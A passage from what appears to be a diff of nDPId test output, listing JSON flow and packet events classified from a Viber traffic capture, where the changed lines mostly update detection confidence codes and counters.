jc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.196204} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.196204} 02402{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1527155685757,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1527155685757,"pkt":"MAdNo1+nAA6OMNv9CABFAAXcOTwAAEABunTAqAAPwKgAEQAA5UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2N
zg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="} -00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":425,"source":"viber.pcap","alias":"nDPId-test","packets-captured":425,"packets-processed":420,"total-skipped-flows":0,"total-l4-payload-len":122215,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":23,"total-detection-updates":17,"total-updates":0,"current-active-flows":26,"total-active-flows":26,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":136,"global_ts_msec":1648952182644} 
+00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":425,"source":"viber.pcap","alias":"nDPId-test","packets-captured":425,"packets-processed":420,"total-skipped-flows":0,"total-l4-payload-len":122215,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":23,"total-detection-updates":19,"total-updates":0,"current-active-flows":26,"total-active-flows":26,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":138,"global_ts_msec":1648952182644} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648952182644,"flow_last_seen":1648952182644,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952182644,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1648952182644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648952182644,"pkt":"eJS0JASgYDjgxTWgCABFAAA8QZ1AAD8GBoHAqAJkNAD8kb4yEJT33RMVAAAAAKAC\/\/+7mwAAAgQFtAQCCApvD0\/7AAAAAAEDAwk="} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1648952182749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648952182749,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAAOcGoB00APyRwKgCZBCUvjJ96pBe990TFqASaN8gOAAAAgQFrAQCCArnVjzbbw9P+wEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1648952183355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648952183355,"pkt":"eJS0JASgYDjgxTWgCABFAAA0QZ5AAD8GBojAqAJkNAD8kb4yEJT33RMWfeqQX4AQAKy2OQAAAQEICm8PUPPnVjzb"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648952182644,"flow_last_seen":1648952183458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1648952183458,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648952182644,"flow_last_seen":1648952183458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1648952183458,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
+00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1527155670640,"flow_last_seen":1527155677861,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":5405,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155670640,"flow_last_seen":1527155670672,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":2960,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1527155670640,"flow_last_seen":1527155677861,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":5405,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155670640,"flow_last_seen":1527155670672,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} +00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":2960,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1527155638428,"flow_last_seen":1527155685200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":591,"flow_tot_l4_payload_len":5517,"flow_avg_l4_payload_len":95,"midstream":1,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} 
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} +00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646968,"flow_last_seen":1527155666982,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
